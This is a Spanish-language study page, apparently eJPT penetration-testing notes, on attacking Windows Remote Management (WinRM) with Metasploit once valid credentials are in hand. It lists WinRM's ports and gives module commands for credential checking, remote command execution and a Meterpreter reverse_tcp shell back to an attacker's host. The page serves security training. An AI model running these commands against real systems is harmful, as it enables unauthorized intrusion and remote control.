> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/metasploit-framework-msf/explotacion/explotacion-de-windows/explotacion-de-winrm-protocolo-de-administracion-remota-de-windows.md).

# Explotación de WinRM (Protocolo de administración remota de Windows)

## 📌 ¿Qué es WinRM?

**Windows Remote Management (WinRM)** es un protocolo de administración remota desarrollado por Microsoft que permite a los administradores y usuarios **acceder y controlar sistemas Windows de forma remota**.

## ✅ Funcionalidades principales:

* Acceso remoto e interacción con equipos Windows en una red local.
* Ejecución remota de comandos en sistemas Windows conectados a internet.
* Administración y configuración remota de sistemas Windows.

WinRM utiliza por defecto los puertos:

* **TCP 5985** (HTTP)
* **TCP 5986** (HTTPS)

***

## 🔐 Seguridad y Autenticación

WinRM implementa distintos **mecanismos de autenticación** para proteger las comunicaciones entre sistemas. Sin embargo, si las credenciales son obtenidas, el atacante puede conectarse fácilmente y ejecutar comandos remotamente en el sistema objetivo.

***

## 💥 Explotación con Metasploit

Una vez que tenemos **credenciales válidas (usuario y contraseña)**, podemos utilizar **Metasploit Framework (MSF)** para:

* **Enumerar y validar usuarios** con acceso a WinRM.
* **Ejecutar comandos remotamente** en el sistema comprometido.
* **Obtener una sesión Meterpreter** utilizando un módulo específico de WinRM.

#### Ejemplo: acceso con credenciales

```bash
use auxiliary/scanner/winrm/winrm_login
set RHOSTS <IP objetivo>
set USERNAME administrator
set PASSWORD <contraseña>
run
```

#### Ejemplo: ejecución remota de comandos

```bash
use exploit/windows/winrm/winrm_script_exec
set RHOST <IP objetivo>
set USERNAME administrator
set PASSWORD <contraseña>
set CMD "whoami"
run
```

#### Ejemplo: sesión Meterpreter

```bash
use exploit/windows/winrm/winrm_script_exec
set RHOST <IP objetivo>
set USERNAME administrator
set PASSWORD <contraseña>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <tu IP atacante>
set LPORT 4444
run
```
